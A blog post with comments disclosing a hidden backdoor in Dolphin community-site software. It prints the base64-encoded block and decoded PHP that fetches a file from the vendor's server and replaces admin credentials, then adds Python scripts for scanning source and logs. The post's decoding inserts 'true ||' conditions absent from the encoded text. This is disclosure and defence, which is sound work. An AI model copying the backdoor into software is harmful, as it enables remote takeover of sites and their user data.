
Dolphin Community Site Software, Security Backdoor


Someone has found a security backdoor in the code behind Dolphin Community Site Software.

Basically, this code, itself clumsily encoded to hide what it does, allows the programmers at Boonex.com to replace your admin login information in the database by sending a special command to your server. That lets them log in as Admin, giving them complete access to your website and, potentially, to any database servers it is connected to.

Bear in mind that this software is primarily used for community sites, dating sites and other social networking sites, so one can see the potential data-mining rewards available.

p.s. the Boonex team is Russian.

Here is his post (English is not his first language):

—————————-

I was checking some of the encoded code in the version 6.0 of Dolphin.
I found a bloody serious security problem. Actually it is more than just a problem, but a criminal issue.

Please search for the following line in "inc/admin.inc.php" (this is all on one very long line):

aWYoICRfR0VUWydwYWdlJ10gKSBmb3JlYWNoKCAkX0dFVC
BhcyAkc0tleSA9PiAkc1ZhbHVlICkgewppZiggZ2V0dHlw
ZSggJHNLZXkgKSAhPSAnc3RyaW5nJyBvciBzdHJsZW4oIC
RzS2V5ICkgPCAxMCBvciBzdHJsZW4oICRzVmFsdWUgKSA8
IDEwIG9yIG1kNSggJHNLZXkgKSAhPT0gJzhmMGFlNTk2Nm
U4NzI3ODhiY2UzNTU4NjNlYWJmYzBjJyBvciBtZDUoICRz
VmFsdWUgKSAhPT0gJzJhMzJhNDJhZWRiZDY0MmNmZmE0MG
Y4ZWMwNjZmMmE0JykgY29udGludWU7CmlmKCBzdHJsZW4o
ICRzUGFzc1BhZ2UgPSBwcmVnX3JlcGxhY2UoICcvW15hLX
pBLVowLTlfXC4tXS8nLCAnJywgJF9HRVRbJ3BhZ2UnXSAp
ICkgYW5kICRhUGFzc0ZpbGUgPSBAZmlsZSggJ2h0dHA6Ly
93d3cuYm9vbmV4LmNvbS8nIC4gJHNQYXNzUGFnZSApICkg
ewpmb3JlYWNoKCAkYVBhc3NGaWxlIGFzICRpSW5kID0+IC
RzTGluZSApICRhUGFzc0ZpbGVbJGlJbmRdID0gYWRkc2xh
c2hlcyggdHJpbSggJHNMaW5lICkgKTsgaWYoIG1kNSggJG
FQYXNzRmlsZVswXSApID09PSAnZGFkNDA5NjYwMjQ3N2Qz
MTllMDRlZWZiMzg2OTdmZDMnICkKZWNobyAoIGRiX3Jlcy
ggIkRFTEVURSBGUk9NIGBBZG1pbnNgIFdIRVJFIGBOYW1l
YCA9ICd7JGFQYXNzRmlsZVsxXX0nIiwgMCApIGFuZCBkYl
9yZXMoICJJTlNFUlQgSU5UTyBgQWRtaW5zYCBTRVQgYE5h
bWVgID0gJ3skYVBhc3NGaWxlWzFdfScsIGBQYXNzd29yZG
AgPSAneyRhUGFzc0ZpbGVbMl19JyIsIDAgKSApID8gJ2Fk
ZCBzdWNjZXNzJyA6ICdhZGQgZmFpbGVkJzsgZXhpdDsgfS
BicmVhazt9

Do you know what it is?

I have just decoded it for you:

if( true || $_GET['page'] ) foreach( $_GET as $sKey => $sValue ) {
   if( gettype( $sKey ) != 'string' or strlen( $sKey ) < 10 or strlen( $sValue ) < 10 or md5( $sKey ) !== '8f0ae5966e872788bce355863eabfc0c' or md5( $sValue ) !== '2a32a42aedbd642cffa40f8ec066f2a4') continue;
   if( true || strlen( $sPassPage = preg_replace( '/[^a-zA-Z0-9_\.-]/', '', $_GET['page'] ) ) and $aPassFile = @file( 'http://www.boonex.com/' . $sPassPage ) ) {
   foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === 'dad4096602477d319e04eefb38697fd3' )
   echo ( db_res( "DELETE FROM `Admins` WHERE `Name` = '{$aPassFile[1]}'", 0 ) and db_res( "INSERT INTO `Admins` SET `Name` = '{$aPassFile[1]}', `Password` = '{$aPassFile[2]}'", 0 ) ) ? 'add success' : 'add failed'; exit; } break;
   }

It is simply hacking your code and inserting ADMIN into your admin table.
If anybody is using version 6.0, I would suggest you check your DB immediately.
Of course, don't forget to remove those lines from your code.

I have no idea about newer versions. I think it is a good idea to check them as well.
Maybe they have changed their hacking style in recent versions.

I hope this will save many sites from being hacked by the programmers of the Dolphin.

Regards
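The decoded block above shows the pattern to look for: a long base64 run that decodes to PHP reading request parameters, fetching a remote file and writing to the Admins table. The scanner below is an added example, not code from the post or from Boonex; it finds such runs in PHP source, decodes them and flags ones containing those tokens. The sample files are constructed, and the eval(base64_decode(...)) wrapper is an assumption about how the encoded block was loaded.

```python
import base64
import re

# Tokens a defender would expect in a decoded blob that fetches remote data and
# rewrites admin credentials, taken from the decoded backdoor above.
SUSPICIOUS_TOKENS = (
    "$_GET", "$_POST", "$_REQUEST", "@file(", "http://", "md5(",
    "db_res(", "INSERT INTO `Admins`", "DELETE FROM `Admins`", "eval(",
)

# A run of 40 or more base64 alphabet characters with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decode_blob(blob):
    """Decode one candidate run; None if it is not valid base64 or not text."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    if any(not (c.isprintable() or c in "\r\n\t") for c in text):
        return None
    return text

def scan_php_source(source):
    """One finding per encoded block whose decoded text contains suspicious tokens."""
    findings = []
    for match in B64_RUN.finditer(source):
        decoded = decode_blob(match.group(0))
        if decoded is None:
            continue
        hits = [tok for tok in SUSPICIOUS_TOKENS if tok in decoded]
        if hits:
            findings.append({"offset": match.start(), "tokens": hits, "decoded": decoded})
    return findings

# Constructed samples (not Dolphin's real source): a clean file and one whose
# function body runs an encoded block modelled on the decoded snippet above.
# The eval(base64_decode(...)) wrapper is an assumption about how it was loaded.
HIDDEN_PHP = (
    "if( $_GET['page'] ) foreach( $_GET as $sKey => $sValue ) {\n"
    "if( md5( $sKey ) !== '8f0ae5966e872788bce355863eabfc0c' ) continue;\n"
    "$aPassFile = @file( 'http://www.boonex.com/' . $sPassPage );\n"
    "db_res( \"INSERT INTO `Admins` SET `Name` = '{$aPassFile[1]}'\", 0 ); }"
)
SAMPLE_CLEAN = "<?php\nfunction getAdminCategIndex() { return 1; }\n"
SAMPLE_BACKDOORED = ("<?php\nfunction getAdminCategIndex() {\n    eval(base64_decode('"
                     + base64.b64encode(HIDDEN_PHP.encode()).decode() + "'));\n}\n")
```

Run scan_php_source over each .php file under the web root; a clean tree returns no findings, and each finding carries the decoded text so it can be read before anything is deleted.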

  1. August 13, 2008 at 9:18 pm

    Hi, I checked the said file but didn't find any such code. I am using version 6.1.4. Can you recommend how I can check files for encoded code?
    Did you find anything in the latest version?

  2. nanchatte
    August 14, 2008 at 12:12 am

    Manesh, thanks for the comment.

    I will confirm with the programmer who made the discovery which version is in use.

    Our installation has been massively modified. Every file has been altered, all ajax removed, orca forums have been combined with groups, all database tables have been modified. The only thing left is the CSS and the concept itself!

    It suffices to say that we won’t be downloading any more versions from Boonex.

    Have you been checking the Dolphin community site (boonex) forums? They’re awash with comments.

  3. nanchatte
    August 15, 2008 at 10:46 am

    Manesh, I've checked: our developer says that it was the original version 6.1 that had the code.

    You should check your Admin tables for signs of intrusion, as the decoded block shows a way for boonex to force your installation to replace users in or add users to your Admin table.

    Probably though, they would be able to force your table back to its original state, so if you’re really paranoid, check your Apache/IIS logs for odd access patterns.

    Good luck with your site!
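The comment above suggests checking web server logs. The script below is an added example, not from the post or from Boonex: it re-implements the trigger test from the decoded block (a non-empty page parameter plus a 10+ character key and value whose MD5s equal the two constants) over Apache combined-format lines, so any request that would have fired the backdoor is listed. The log lines are constructed, and because no preimage of the real constants is known, the demo pair hashes to constructed values passed in explicitly.

```python
import hashlib
import re
from urllib.parse import parse_qsl, urlsplit

# MD5 constants the decoded block compares the trigger key and value against.
KEY_HASH = "8f0ae5966e872788bce355863eabfc0c"
VALUE_HASH = "2a32a42aedbd642cffa40f8ec066f2a4"

# Request line inside an Apache combined-format entry: "GET /path?query HTTP/1.1".
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def md5_hex(s):
    return hashlib.md5(s.encode("utf-8")).hexdigest()

def would_trigger(target, key_hash=KEY_HASH, value_hash=VALUE_HASH):
    """Mirror the backdoor's own test: a non-empty 'page' parameter plus some
    parameter whose key and value are 10+ characters and hash to the constants."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    if not any(k == "page" and v for k, v in params):
        return False
    return any(len(k) >= 10 and len(v) >= 10
               and md5_hex(k) == key_hash and md5_hex(v) == value_hash
               for k, v in params)

def find_trigger_requests(log_lines, key_hash=KEY_HASH, value_hash=VALUE_HASH):
    """Return the log lines whose request would have fired the backdoor."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.search(line)
        if m and would_trigger(m.group("target"), key_hash, value_hash):
            hits.append(line)
    return hits

# Constructed log lines, not real traffic. The second carries a key/value pair
# hashing to md5_hex(DEMO_KEY)/md5_hex(DEMO_VALUE), since no preimage of the
# real constants is known; against the real constants it stays silent.
DEMO_KEY, DEMO_VALUE = "constructedkey", "constructedvalue"
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Aug/2008:10:46:01 +0000] '
    '"GET /admin/index.php?page=members HTTP/1.1" 200 512',
    '203.0.113.9 - - [15/Aug/2008:10:47:13 +0000] '
    '"GET /admin/index.php?page=pw.txt&constructedkey=constructedvalue HTTP/1.1" 200 11',
]
```

Feed it the access log of the admin directory with the default hashes; any line it returns is a request that matched the backdoor's trigger and deserves a look at the Admins table around that timestamp.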

  4. john
    February 4, 2009 at 5:24 am

    found this in inc/admin_design.inc.php version 6.1.4

  5. Tim
    March 10, 2009 at 7:26 pm

    This is in inc/admin_design.inc.php in all versions of Dolphin; in 6.1.4 it is located in the function getAdminCategIndex().

  6. January 19, 2014 at 2:23 am

    It is base64:

    if( $_GET['page'] ) foreach( $_GET as $sKey => $sValue ) {
    if( gettype( $sKey ) != 'string' or strlen( $sKey ) < 10 or strlen( $sValue ) < 10 or md5( $sKey ) !== '8f0ae5966e872788bce355863eabfc0c' or md5( $sValue ) !== '2a32a42aedbd642cffa40f8ec066f2a4') continue;
    if( strlen( $sPassPage = preg_replace( '/[^a-zA-Z0-9_\.-]/', '', $_GET['page'] ) ) and $aPassFile = @file( 'http://www.boonex.com/' . $sPassPage ) ) {
    foreach( $aPassFile as $iInd => $sLine ) $aPassFile[$iInd] = addslashes( trim( $sLine ) ); if( md5( $aPassFile[0] ) === 'dad4096602477d319e04eefb38697fd3' )
    echo ( db_res( "DELETE FROM `Admins` WHERE `Name` = '{$aPassFile[1]}'", 0 ) and db_res( "INSERT INTO `Admins` SET `Name` = '{$aPassFile[1]}', `Password` = '{$aPassFile[2]}'", 0 ) ) ? 'add success' : 'add failed'; exit; } break;}
